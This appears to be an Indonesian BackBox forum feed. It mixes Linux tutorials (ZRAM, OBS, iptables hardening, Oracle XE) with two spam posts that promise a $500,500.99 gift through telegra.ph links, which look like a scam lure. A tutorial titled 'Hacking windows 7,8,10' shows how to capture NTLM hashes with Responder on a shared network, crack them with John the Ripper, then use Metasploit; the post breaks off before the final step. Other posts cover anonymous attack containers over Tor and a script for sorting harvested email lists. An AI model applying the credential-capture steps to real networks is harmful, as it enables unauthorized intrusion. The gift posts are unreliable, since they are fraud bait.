BackBox Indonesia - All Forums

Receive a $500,500.99 Gift That’s Pure Generosity

Thu, 22 Jan 2026 17:35:50 +0000

We’re Making a $500,500.99 Gift Happen for You https://telegra.ph/Get-a-gift-worth-up-t...2742-01-21

Confirmation ID: z8ur9d8c8s4b1a8ap2ol7n7d9f9c9m7af1wr0g1x7c7o0z2tf0br0v6h9q0v3l9kp4xb9i8x0h5v9f6qh0xe7f9c7y8t7j3eu9pc0d8p4w1d6m4r

Claim a $500,500.99 Gift That’s Totally Yours

Thu, 22 Jan 2026 11:35:39 +0000

GET A $500,500.99 GIFT THAT’S FREE AND FABULOUS https://telegra.ph/Get-a-gift-worth-up-t...7792-01-21

Sequence: h9la5a2c7i5i7y7tq5et0q7t7p2z4d5xh1eu2h7h9z0y1n7nq5uv1z1n1r9d1g5bv4vv9w4s4u6y4d7md2zw4k1f2g7g2w4vq8yq6k7u5x0q9d5m

Konfigurasi ZRAM Swap Linux

Fri, 24 Jan 2020 20:08:28 +0000

Hello there

Saya akan share mengenai ZRam Swap Linux

Apa itu Zram ?

Zram adalah modul kernel linux atau Virtual Memory Compression yang terletak pada block device dengan ukuran yang disesuaikan oleh system namun dapat juga kita mengatur ukuran dari zram swap tersebut. Zram menggunakan fast compression dengan algoritma (LZ4) sehingga data yang masuk ke dalam zram swap kan di kompresi dan disimpan ke dalam RAM.

Zram menjadi alternatif swap partisi bagi yang tidak mau mengorbankan partisi Hardisk atau SSD, Zram biasanya terletak pada /sys/block/zram0 dan swap partisiny ada pada /dev/block/zram0.

Pada kenyataan nya SWAP tetap dibutuhkan bagi mereka yang mempunyai RAM kecil maupun RAM besar dengan multitasking yang tinggi "menjalankan proram berat seperti android studio dan lainya".

Bagaimana konfigurasi Zram swap linux ?

1. Buatlah ZRAM block device

Code:
sudo modprobe zram

2. Set Zram dengan kompresi tinggi dengan menggunakan algoritma

Code:
sudo sh -c "echo 'lz4' > /sys/block/zram0/comp_algorithm"

3. Set 2 Gigabyte untuk swap file

Code:
sudo sh -c "echo '2G' > /sys/block/zram0/disksize"

Note : Kalian bisa set file sesuai dengan keinginan.

4. Aktifkan zram swap block device

Code:
sudo mkswap --label zram0 /dev/zram0

5. Aktifkan zram swap block device dengan prioritas tinggi

Code:
sudo swapon --priority 100 /dev/zram0

Note : Kalian bisa mengatur priotas sesuai dengan keinginan.

6. Cek apakah Zram swap sudah dibuat dengan perintah

Code:
free -h

Lihat gambar berikut

Desc : Zram swap telah di buat dengan size 2 Gb.

Note : Zram akan hilang ketika Laptop/PC di restart, untuk itu di perlukan konfigurasi agar zram aktif pada saat laptop/pc di restart.

1. Buatlah file zram.service pada lokasi /etc/systemd/system/

Code:
sudo nano /etc/systemd/system/zram.service

2. Masukan script berikut

Code:
[Unit] 

Description=zRam block devices swapping 

[Service] 

Type=oneshot 

ExecStart=/usr/bin/bash -c "modprobe zram && echo lz4 > /sys/block/zram0/comp_algorithm && echo 2G > /sys/block/zram0/disksize && mkswap --label zram0 /dev/zram0 && swapon --priority 100 /dev/zram0" 

ExecStop=/usr/bin/bash -c "swapoff /dev/zram0 && rmmod zram" 

RemainAfterExit=yes 

[Install] 

WantedBy=multi-user.target

3. Aktifkan zram.service agar berjalan pada saat startup

Code:
sudo systemctl enable zram

Done !!!!

Cara menonaktifkan zram block device

Code:
sudo swapoff /dev/zram0

Cara menghapus zram dari kernel

Code:
sudo rmmod zram

Cara menonaktifkan zram agar tidak berjalan pada startup

Code:
sudo systemctl disable zram.service

Cheer's EDELWIS

OBS Studio alternative screen video recording

Fri, 24 Jan 2020 19:06:21 +0000

Hello dear

Saya mau share alternatif screen video recording selain Kazam, Simple Screen Recoder dan Record my desktop.

OBS Studio adalah perekam layar dan juga bisa streaming pada platform :

Youtube
Twitch
Facebook
Mixer.com
Twitter

Obs studio bisa merekam dengan resolusi 4K dengan berbagai format output seperti MP4, FLV, MKV dan AVI, kalian bisa mengatur FPS sesuai yang diinginkan dari 30 FPS, 60 FPS, 90 FPS sampai 120 FPS. OBS juga dapat melakukan 2 hal yaitu streaming online dan bisa recording pada saat streaming berlangsung.

kalian bisa lihat informasi dari situs nya langsung pada link berikut OBS STUDIO

cara install Obs Studio
1. Ubuntu/Backbox installation

Code:
sudo apt-get install ffmpeg

Setelah itu tambahkan repository obs studio dengan cara :

sudo add-apt-repository ppa:obsproject/obs-studio

sudo apt-get update

sudo apt-get install obs-studio

2. Debian installation

Code:
sudo apt install obs-studio

3. Arch/Manjaro installation

Code:
sudo pacman -S obs-studio

Note : untuk manjaro sebaik nya mengaktifkan repository AUR

Screenshots

untuk instalasi distro linux lain nya bisa mengunjungi WIKI INSTALLATION

Cheer's EDELWIS

Meminimalisir serangan dos/ddos pada server

Wed, 08 May 2019 13:50:32 +0000

Hallo kembali lagi dengan saya di sini,
Untuk melanjutkan artikel sebelumnya tentang cara mengamankan server dari berbagai serangan.
Di post kali ini saya akan membahas bagaimana cara meminimalisir serangan DOS/DDOS pada server yang kita kelola secara teknisnya.
Yang akan kita bahas kali ini adalah:

Blok traffic masuk ICMP
Blok IP yang di sinyalir membahayakan server dengan iptables
Batasi jumlah traffic masuk pada server
Tutup port yang tidak di perlukan
Batasi ukuran file yang di upload
Pasang IDS & IPS untuk meminimalisir serangan

Pertama:
Oke langsung saja ke bahasan pertama yaitu mem blok traffic masuk ICMP.
Kenapa ICMP harus di batasi??
Karena perlu kita ketahui juga dalam serangan DOS/DDOS itu ada namanya teknik "Ping of death" atau bisa di sebut sebagai serangan yang di tujukan pada protokol ICMP.
Untuk cara menangkalnya cukup mudah, kita hanya menambahkan rule iptables saja.
Tetapi sebelum mengeksekusi perintahnya kita harus menggunakan user root terlebih dahulu.
Perintahnya kurang lebih seperti ini

Code:
$ iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

dan jika kalian ingin menghapus rute tersebut cukup mengganti "-A" menjadi "-D".

Code:
$ iptables -D INPUT -p icmp --icmp-type echo-request -j DROP

Cukup mudah bukan?? :)

Kedua:
Oke kita lanjut ke pembahasan kedua, yaitu membloking ip address yang di sinyalir membahayakan server.
Seperti biasa tools yang di gunakan masih menggunakan iptables.
Perintahnya serperti ini

Code:
$ iptables -A INPUT -s ipaddress -j DROP

Sebagai contoh kita akan memblok ip 1.1.1.1, dan perintahnya seperti ini.

Code:
$ iptables -A INPUT -s 1.1.1.1 -j DROP

Seperti pembahasan di atas, jika kita ingin meng unblock tinggal mengganti "-A" menjadi "-D".

Code:
$ iptables -D INPUT -s 1.1.1.1 -j DROP

Sudah mulai sedikit paham dengan iptables?? :)

Ketiga:
Lanjut ke pembahasan ke tiga yaitu tentang cara membatasi maksimal request yang masuk.
Kali ini masih seputar iptables, dan tidak perlu lagi seting di webserver.
Tujuannya yaitu menghidari bruteforce, DOS/DDOS pada web server, dan bisa juga di terapkan ke service yang lain.
Sebagai contoh bisa di terapkan juga ke port ssh agar tidak terjadi serangan bruterforce secara berturut turut.
Ketika ada salah satu ip yang mencoba mem bruteforce maka ip tersebut akan di block oleh iptables untuk sementara.
Perintahnya kurang lebih seperti ini

Code:
$ iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent --set

$ iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent  --update --seconds [waktu] --hitcount 4 -j DROP

Keterangan:
[port] = port yang akan kita batasi koneksinya
[interface] = interface jaringan yang di gunakan pada server
[waktu] = waktu tunggu setelah di blok oleh ip tables

Sebagai contoh apabila di server kita mempunyai 3 port yang di buka maka perintahnya seperti ini

Code:
$ iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent --set

$ iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent --set

$ iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent --set

$ iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP

$ iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP

$ iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP

Port 22 = SSH
Port 80 = Web server
Port 443 = Web server
ens3 = Interface jaringan

Kurang lebih seperti itu teknisnya dalam membatasi koneksi yang masuk pada server menggunakan iptables.
Dan jangan lupa juga kalau kita sudah menginput rule iptables di atas, kita harus menyimpan rule tersebut dengan perintah iptables-save.

Code:
$ iptables-save

Keempat:
Untuk tahap ke empat yaitu menutup port yang tidak terpakai.
Kali ini caranya agak sedikit berbeda, yang di mana sebelum mematikan service kita harus mengecek terlebih dahulu port yang terbuka dengan netstat.
Perintah dasarnya seperti ini

Code:
$ netstat -ntlp

Untuk melihat service apa saja yang di jalankan, kita harus menggunakan user root agar bisa terlihar name servicenya.
Karena kalo kita menjalankan netstat menggunakan user biasa, nama service dan nomer pid nya tidak akan muncul di outputnya.

Setelah kita mengetahui pid dan port mana yang tidak terpakai, tahap selanjutnya adalah memberhentikan service tersebut.
Sebagai contoh

Di gambar tersebut terlihat service haproxy dan python yang sedang berjalan tetapi proses tersebut sebenernya tidak terpakai.
Selain itu juga port 31337 itu adalah port backdoor (bind shell), dan ini yang akan menyebabkan server kita menjadi tidak aman.
Untuk cara memberhentikan service dan backdoor tersebut ada banyak cara, yang pertama memberhentikan terlebih dahulu service haproxy yang sedang berjalan dengan cara seperti ini.

Code:
$ /etc/init.d/haproxy stop

atau

$ systemctl stop haproxy

Kemudian cara selanjutnya yaitu mendisable service tersebut saat restart dengan perintah ini.

Code:
$ systemctl disable haproxy

Selanjutnya jika service yang berjalan tidak ada di dalam systemctl atau init.d kita bisa mematikan proses secara paksa dengan perintah ini.

Code:
$ kill -9 

ini adalah pid proses yang keluar di dalam output netstat tadi, sebagai contoh pid yang menjalankan python yaitu 5615 dan perintahnya seperti ini.

Code:
$ kill -9 5615

Kalo kalian sudah terbiasa dengan perintah linux pastinya cara ini sangat mudah di lakukan. :)

Kelima:
Yang ke lima adalah bagaimana caranya agar koneksi yang di terima pada server bisa kita limit.
Karena secara default, bandwidth koneksi yang di gunakan itu rata" tanpa ada batasan ukurannya.
Di sini kita akan coba me limit bandwidth yang akan kita gunakan menggunakan aplikasi wondershaper.
Untuk installasi nya cukup mudah, kita tinggal mengetik saja perintah ini di terminal.

Code:
$ apt install make

$ git clone https://github.com/magnific0/wondershaper

$ cd wondershaper

$ make install

$ chmod +x /usr/bin/wondershaper

$ systemctl enable wondershaper

Setelah installasi selesai, kita tinggal menyesuaikan interface yang di pakai, kecepatan download dan upload pada setingan wondershaper dengan mengedit file /etc/conf.d/wondershaper.conf kemudian mengaktifkan service nya.

Code:
$ nano /etc/conf.d/wondershaper.conf

$ cat /etc/conf.d/wondershaper.conf

[wondershaper]

IFACE="ens3"

DSPEED="2048"

USPEED="2048"

$ systemctl start wondershaper

Kemudian jika kita ingin mengecek apakah wondershaper nya sudah bekerja dengan baik, kita bisa cek menggunakan aplikasi speedtest di terminal.

Kenapa hal ini harus kita lakukan??
Karena sebagai kita ketahui bahwa service DDOS itu bisa di beli secara online, dan bisa di jalankan juga tanpa menggunakan koneksi yang kita pakai.
Sehingga serangan yang di hasilkan bisa sangat besar jika server kita tidak di batasi bandwidth nya.

Keenam:
Dan yang terakhir adalah memasang IDS dan IPS pada web server.
Cara ini cukup mudah juga dalam proses installasinya, kita tinggal install saja aplikasi snort di terminal server kita.

Code:
$ apt install snort

Setelah proses installasi selesai, snort akan berjalan secara otomatis di system.
Dia juga akan menganalisa setiap request yang masuk apakah request tersebut mencurigakan atau tidak.
Kemudian hasil analisa tersebut akan masuk ke dalam log server untuk di analisa oleh kita.
Selain itu juga kita bisa membuat rule sendiri untuk pengamanan pada server kita.

Mungkin cukup sekian pembahasan kali ini tentang cara meminimalisir serangan DOS/DDOS pada server.
Kurang lebih nya mohon, di maklumi.
Karena saya sendiri pun masih belajar dan mendalami bagaimana cara mengamankan server dari berbagai serangan.
Next saya akan melanjutkan tulisan berikutnya.

Sekian...

Cara mengamankan server dari berbagai serangan

Tue, 07 May 2019 07:04:09 +0000

Halo guys, ini adalah postingan pertama saya di sini.
Kali ini saya akan membahas bermaca macam cara agar server yang kita kelola benar" aman dari segala serangan keamana yang sudah banyak di publish dalam beberapa dekade ini.
Saya sedikit miris juga dengan banyaknya perusahaan dan instansi yang menganggap kerentanan keamanan itu sangat sepele.
Selain itu minim sekali artikel yang membahas tentang cara mengamankan berbagai serangan secara teknis, sedangkan serangan keamanan sendiri telah banyak di ketahui banyak orang dalam beberapa tahun kebelakang ini.
Saya asumsikan orang-orang tersebut adalah wanna be hacker.

Mungkin di artikel ini saya akan menjelaskan sedikit tentang hal yang perlu kita pertimbangkan sebelum memulai ke topik yang sangat utama dalam artikel ini.
Sebelum memulai ke pembahasan yang lebih rinci alangkah baiknya kita mengetahui dulu hal-hal yang fundamental dalam membangun suatu system.
Hal pertama yang harus kita pikirkan adalah memilih system operasi terbaik dari yang terbaik.

Perlu kita ketahui bahwa system operasi di dunia ini sangatlah banyak, maka dari itu kita harus memilih system operasi terbaik agar mendapatkan hasil yang baik juga dalam segi kemampuan dalam menghandle setiap proses yang akan kita jalankan kedepannya.
Untuk membuktikan bahwa system operasi terbaik itu adalah dengan mencoba semua system operasi kemudian mencoba satu persatu kemampuannya sampai di mana, serta pergerakan aplikasi yang di gunakan apakah selalu update setiap saat, kemudian apakah system operasi tersebut bisa menahan setiap serangan atau tidak.
Kalau kita sudah mencoba sendiri semua system operasi dan mencoba pengetesan serangan, aplikasi dan lain lain, kita tidak akan pernah terhasut lagi oleh orang-orang yang fanatik terhadap salah satu system operasi, kemudian mendewa dewakan system operasi tersebut. h3h3
Karena ini sangat penting bagi kalian jika memang ingin membangun system yang benar-benar aman dari segala macam serangan.

Saya akan sedikit bercerita tentang penelitian saya dulu tentang system operasi yang terbaik itu seperti apa.
Mungkin tepatnya 1,5 tahun kebelakang sejak postingan ini di publish saya pernah meneliti system operasi dengan mencoba semua system operasi yang bisa di jadikan sebagi server serperti OpenBSD, FreeBSD, Redhat, Fedora, Centos, Ubuntu, Debian, Slackware, Gentoo, Arch, Alpine, windows, dll.
Dari semua system operasi itu cuma ada beberapa system operasi yang bisa menghandle serangan DOS/DDOS, selebihnya tidak bisa meng handle.
Saya sebut saja system operasi yang di maksud adalah

OpenBSD
Redhat
dan Fedora

Dan untuk system operasi dengan aplikasi default dan repository yang selalu update urutannya adalah

Archlinux
OpenBSD
Redhat
dan Fedora

Dari statement saya ini kalian boleh percaya atau tidak, yang pasti ini adalah hasil dari penelitian saya tentang pemilihan system operasi, yang pada saat itu juga saya membangun system linux sendiri dari awal (LFS) di perusahaan yang pernah saya tempati.
Jika kalian Ingin menggunakan system operasi yang paling aman untuk server, saya menyarankan menggunakan OpenBSD.
Hal ini di dukung juga oleh banyaknya artilkel yang menyebutkan bahwa OpenBSD adalah system operasi ter aman nomer 1 di antara system operasi yang lain.
Kenapa OpenBSD??
Saya sudah mencoba juga bahwa OpenBSD sendiri selain bisa menghandle DOS/DDOS, path system yang di gunakan seperti folder /etc/ dll tidak dapat tampil dan di baca dalam mode web server atau backdoor sekalipun. Jadi hanya folder web server saja yang dapat di akses secara umum.
Hal ini yang menunjukan bahwa openbsd bisa meminimalisir exploitasi kernel yang di gunakannya.
Selain itu juga config yang di gunakan dari beberapa aplikasi web server sudah di set dengan konfigurasi terbaik, sebagai contoh kecilnya di aplikasi nginx.
Yang di mana setingan default server_token di set menjadi off.
Tujuannya yaitu untuk menyembunyikan versi nginx yang di gunakan pada system OpenBSD.
Artinya setiap orang yang me request ke server tidak dapat mengetahui versi nginx yang di gunakan pada server.
Dan itu salah satu contoh kecil yang nyata kalau OpenBSD itu system operasi yang aman secara default.
Sampai sekarang pun saya menggunakan OpenBSD sebagai system operasi default untuk production.

Kemudian jika kalian bekerja di korporasi atau pemerintahan yang agak sedikit sulit mengoperasikan OpenBSD, kalian bisa menggunakan Redhat Enterprise sebagai system operasi terbaik nomor 2 dengan dukungan enterprise dari website official nya langsung.
Kenapa harus menggunakan Redhat??
Karena Redhat adalah salah satu system operasi enterprise yang punya banyak dukungan dalam mengupdate setiap aplikasi dan library, selain itu juga update yang di berikan juga sangat cepat tanggap jika menemukan bug yang sangat kritikal.
System operasi ini lah yang paling cocok untuk server setingkat korporasi atau pemerintahan versi saya sendiri.
Saya punya keinginan juga kalo di indonesia ini kedepannya mewajibkan menggunakan Redhat Enterprise sebagai system operasi standart untuk kebutuhan server di level korporasi dan pemerintahan. :)

Tetapi apabila kalian tidak punya cukup kocek untuk dukungan enterprise Redhat, kalian juga bisa mencoba system operasi yang free dan opensource yaitu Fedora sebagai system operasi terbaik ke 3.
Kenapa fedora dan bukan centos?? Centos juga kan turunan dari Redhat Enterprise??
Perlu saya sampaikan juga kalo Fedora itu sudah terpasang kernel, library, dan aplikasi yang paling update di antara turuna redhat yang lainnya (coba buktikan sendiri).
Selain itu juga Fedora sudah di seting secara default untuk bisa menghandle serangan DOS/DDOS.
Dan ini lah alasan fundamental saya kenapa saya lebih suka fedora daripada turunan redhat yang lain.

Dari penjelasan singkat ini saya hanya ingin menyampaikan kalau statement saya bisa saja salah, dan bisa saja benar.
Tapi tidak luput dari hal itu kalian bisa coba buktikan sendiri yang mana system operasi terbaik menurut versi kalian.
Di sini saya hanya mencoba menyampaikan apa yang telah saya teliti dan saya buktikan sendiri.
Selebihnya kalian bisa menilai sendiri. :)

Kembali ke bahasan awal yaitu apa dan bagaimana teknik untuk mengamankan server dari berbagai serangan.
Kali ini saya akan menjelaskan secara teknis menggunakan system operasi yang sangat banyak di gunakan oleh orang orang di dunia yaitu menggunakan Ubuntu sebagai dasar untuk pengamanan server.
Kenapa saya menggunakan Ubuntu dalam praktek pengamanannya??
Tugas saya kali ini adalah meng edukasi kepada setiap sysadmin yang telah terlanjur menggunakan ubuntu atau debian sebagai system operasi dasar yang di gunakan untuk kebutuhan server, walaupun saya sendiri menggunakan OpenBSD sebagai system operasi default untuk kebutuhan server yang saya kelola.
Selain itu juga setingan Ubuntu yang harus di rubah lebih kompleks daripada setingan OpenBSD sendiri.
Karena di OpenBSD sudah ter seting keamana secara default, kita hanya tinggal seting sedikit saja untuk mendapatkan hasil yang lebih baik.

Kedepannya saya akan menjelaskan beberapa judul yang telah saya tulis di bawah yaitu:

A. Meminimalisir serangan dos/ddos pada server

Blok traffic masuk ICMP
Blok IP yang di sinyalir membahayakan server dengan iptables
Batasi jumlah traffic masuk pada server
Tutup port yang tidak di perlukan
Batasi ukuran file yang di upload
Pasang IDS & IPS untuk meminimalisir serangan

B. Menangkal serangan bruteforce

Jangan izinkan user root masuk ke dalam ssh atau gunakan user biasa untuk login ke ssh
Gunakan private key yang di password untuk login ke ssh
Ganti port default ssh menjadi port random
Batasi pengecekan password yang salah dengan fail2ban
Usahakan password yang di gunakan tidak mudah di tebak
Segala hal yang berhubungan dengan password harus di bedakan

C. Meningkatkan keamanan pada aplikasi yang di pakai

Enkripsi setiap script config database yang di gunakan di server atau pindahkan ke folder yang tidak biasanya
Gunakan ssl di dalam webserver
Jangan simpan private key di dalam server
Jangan simpan file backup di dokumen publik webserver
Rubah alamat phpmyadmin jadi alamat acak
Rubah alamat login admin jadi alamat acak
Gunakan OTP untuk login ke dalam aplikasi
Filter semua POST dan GET yang ada dalam aplikasi

D. Meningkatkan keamana jaringan pada server

Batasi koneksi outgoing menggunakan iptables
Nonaktifkan DNS di /etc/resolv.conf
Hanya izinkan port yang terbuka saja yang bisa di akses publik menggunakan ufw/iptables
Jangan buka port database ke publik
Gunakan 1 ip gateway, 1 ip netmask, 1 ip broadcast, 1 ip address, dan 1 vlan untuk 1 aplikasi

E. Meningkatkan keamanan pada server

Selalu update system operasi yang sedang di gunakan
Sembunyikan versi PHP, apache, dll di header
Non aktifkan directory listing di webserver
Disable shell pada user web server "www-data" di /etc/passwd
Non aktifkan fungsi execute command seperti exec, passthru, php-cgi kalo tidak di perlukan
Di history command jangan tertinggal password apapun

F. Monitoring server untuk meningkatkan keamanan

Selalu cek log aktivitas server (monitoring)
Cek cronjob atau crontab setiap waktu di setiap user
Cek setiap service yang berjalan agar tidak terjadi misconfigurasi
Pasang alamat admin palsu (honeypot)

Untuk kelanjutan artikel kali ini saya akan post di thread yang berbeda.
Tunggu saja updatean selanjutnya.
Sekian.. ;)

Cara installasi Oracle eXpress Edition di Ubuntu

Sat, 28 Jul 2018 11:58:11 +0000

Hallo guys,
Kali ini saya akan mendokumentasikan pengalaman saya saat menginstall Oracle database di dalam system operasi berbasis Ubuntu. Tapi di sini juga kalian bisa menerapkan cara ini di dalam Backbox juga. karena Backbox sendiri termasuk ke dalam distro ubuntu.

Dalam kesempatan kali ini saya akan share mengenai cara installasi Oracle XE (eXpress Edition), karena ketika saya mencari tutorial cara installasi Oracle XE di ubuntu sendiri cukup rumit bagi pemula seperti saya hehe
Karena dari halaman resmi oracle sendiri hanya menyediakan installer untuk system operasi linux turunan dari redhat saja seperti Fedora atau Centos. Tapi di kesempatan kali ini saya sudah membuat file github sendiri untuk menyelesaikan masalah ini.

Langsung saja kita masuk ke topik pembicaraan di awal yaitu tentang installasi Oracle XE.
Caranya cukup sederhana, kita cukup clone github. Setelah itu kita eksekusi file setup.sh

Code:
$ git clone https://github.com/koboi137/oracle-xe

$ cd oracle-xe

$ bash setup.sh

Cukup mudah bukan?? hehe

Secara default setup di atas akan menggenerate user password untuk masuk ke dalam database.
Configurasinya kurang lebih seperti ini

Code:
hostname: localhost

port: 1521

sid: xe

username: system

password: oracle

Selain itu juga ada setingan APEX untuk memonitoring penggunaan database dll.
Untuk aksesnya bisa di lihat di bawah ini.

Code:
# http://localhost:8080/apex/apex_admin

username: ADMIN

password: admin

Cara ini sudah saya praktekkan di dalam VPS, Virtualbox, dan docker. Kalo saat installasi ada error bisa konsul di kolom komentar. :)

Note : Jika kalian ingin mengganti password default saat installasi, kalian bisa edit terlebih dahulu file setup.sh di baris ke 31

Code:
printf 8080\\n1521\\noracle\\noracle\\ny\\n | /etc/init.d/oracle-xe configure &&

Ganti tulisan "oracle" dengan password yang kalian inginkan.
Sekiannn ;)

#ask ada yg tau kenapa backbox tidak bisa upgrade

Sun, 10 Jun 2018 19:00:20 +0000

Failed to fetch http://ppa.launchpad.net/pinta-maintaine...6/Packages 404 Not Found

Hacking windows 7,8,10 (Responder + john + MS17-010)

Thu, 24 May 2018 06:43:23 +0000

Hallo guys,
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.

Bahan bahan yang harus kita persiapkan.
1. Responder [ https://github.com/SpiderLabs/Responder ]
2. John (John the Ripper) [ https://github.com/koboi137/john ]
3. Metasploit

Pertama adalah Responder.
Untuk cara installasinya cukup clone dari github

Code:
$ git clone https://github.com/SpiderLabs/Responder

Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.

Kedua installasi john.
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.

Code:
$ sudo su

$ apt-get install openssl libgmp-dev libgomp1

$ cd /opt

$ git clone https://github.com/koboi137/john

$ cd john/

$ mv librexgen.so.2.0.8 /usr/local/lib/

$ ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0

$ ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so

$ ldconfig

Cara mengeksekusi john

Code:
$ /opt/john/john

Yang ketiga metasploit.
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github
=> https://github.com/rapid7/metasploit-fra...nvironment

Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.
Pertama kita jalankan Responder

Code:
$ cd Responder

$ python Responder.py -I wlan0

Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.
Kurang lebih nanti akan seperti ini prosesnya

Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.

Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.
Perintahnya kurang lebih seperti ini.

Code:
$ cd Responder

$ cd logs/

$ /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt

Atau kalian juga bisa menggunakan wordlist, kalo cara ini tidak mendapatkan hasil.

Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.

Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe

Membuat virtual lab untuk pentest ( Docker Backbox )

Wed, 02 May 2018 07:20:37 +0000

Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps ubuntu kalian.

Code:
$ sudo apt-get install docker.io

setelah itu kita download container backboxnya dengan mengetikan perintah ini

Code:
$ sudo docker pull claudioviviani/backbox4browser-xfce-full

$ sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full

Cukup mudah bukan cara installasinya?? hehe
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.

Di sini kita sudah menginstall container backbox di vps kita.
Untuk masuk ke mode root password defaultnya adalah

Code:
Pass : bbuser

Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.

Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di tutup portnya menggunakan firewall. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian install server openvpn di vps kalian agar si container tidak di akses oleh sembarang orang.

Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.
Setingnya kurang lebih seperti ini

atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.

Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe

Script Filter Email : Gmail, Yahoo & Hotmail

Wed, 07 Mar 2018 18:55:09 +0000

lama ane tidak terjun ke dunia fana ini hihi
kali ini ane mau share script dan sdikit jelaskan tentang tools buatan ane mailfilter.py
langsung aja cekidot ke source code nya :

Code:
#!/usr/bin/env python

from optparse import OptionParser

import os.path

import re

class warna():       #ini definisikan warna

    cetak = '\033[0m'

    ijo ='\033[1;32m'

    putih = '\033[1;37m'

    biru = '\033[1;34m'

    kuning = '\033[1;33m'

    abang = '\033[1;31m'

def author():   

    print('''%s  #tanda %s untuk menentukan string warna

______  ___      ___________________________________

___   |/  /_____ ___(_)__  /___  ____/__(_)__  /_  /_____________

__  /|_/ /_  __ `/_  /__  / __  /_   __  /__  /_  __/  _ \_  ___/

_  /  / / / /_/ /_  / _  /___  __/   _  / _  / / /_ /  __/  /

/_/  /_/  \__,_/ /_/  /_____/_/      /_/  /_/  \__/ \___//_/

                                                       v.01

%s

[+] Author      : Ruitze

[+] Tool        : MailFilter v.01

[+] Description : Filter mailist Gmail, Yahoo, Hotmail

[+] Usage       : python mailFilter.py nameMailist -o %s''' % (warna.ijo,warna.putih, warna.cetak))

regex = re.compile(r'''(

                   ([a-zA-Z0-9._%+-]+)

                    @

                    (gmail|yahoo|hotmail)

                    (\.com)

                    )''', re.VERBOSE)

def file_to_str(filename):

    with open(filename) as f:

        return f.read().lower()

def get_emails(s):

    return (email[0] for email in re.findall(regex, s) if not email[0].startswith('//'))

def main():

    parser = OptionParser()

    parser.add_option('-o','--output',dest='output',help='output file to saveFile.txt', action='store_true')

    (options, args) = parser.parse_args()

    try:

        if args and options.output:

            for arg in args:

                if os.path.isfile(arg):

                    for email in get_emails(file_to_str(arg)):

                        if 'gmail' in email:

                            f =open('gmailFile.txt', 'a')

                            f.write(email+'\n')

                            f.close()

                        elif 'yahoo' in email:

                            f = open('yahooFile.txt', 'a')

                            f.write(email + '\n')

                            f.close()

                        else:

                            f = open('hotmailFile.txt', 'a')

                            f.write(email + '\n')

                            f.close()

                    author()

                    print(warna.cetak)

                    print('%s[+] Succes filter to gmailFile.txt   [+]%s' % (warna.biru, warna.cetak))

                    print('%s[+] Succes filter to yahooFile.txt   [+]%s' % (warna.kuning, warna.cetak))

                    print('%s[+] Succes filter to hotmailFile.txt [+]%s' % (warna.abang, warna.cetak))

                else:

                    print('"{}" is not a file.').format(arg)

        else:

            author()

            print(warna.cetak)

    except Exception as e:

        print('Error Description', e)

if __name__=='__main__':

    main()

BackBox tidak bisa mati (shutdown malah jadi restart)

Sun, 11 Feb 2018 15:55:29 +0000

ada yang ngalamin kaya gini? share dong udah ane coba edit grub nya tapi tetep aja , matiin pake init 0 ,shutdown juga hasilnya sama

MEDUSA Couldn't load "ssh" bagaimana cara ngatasinnya ?
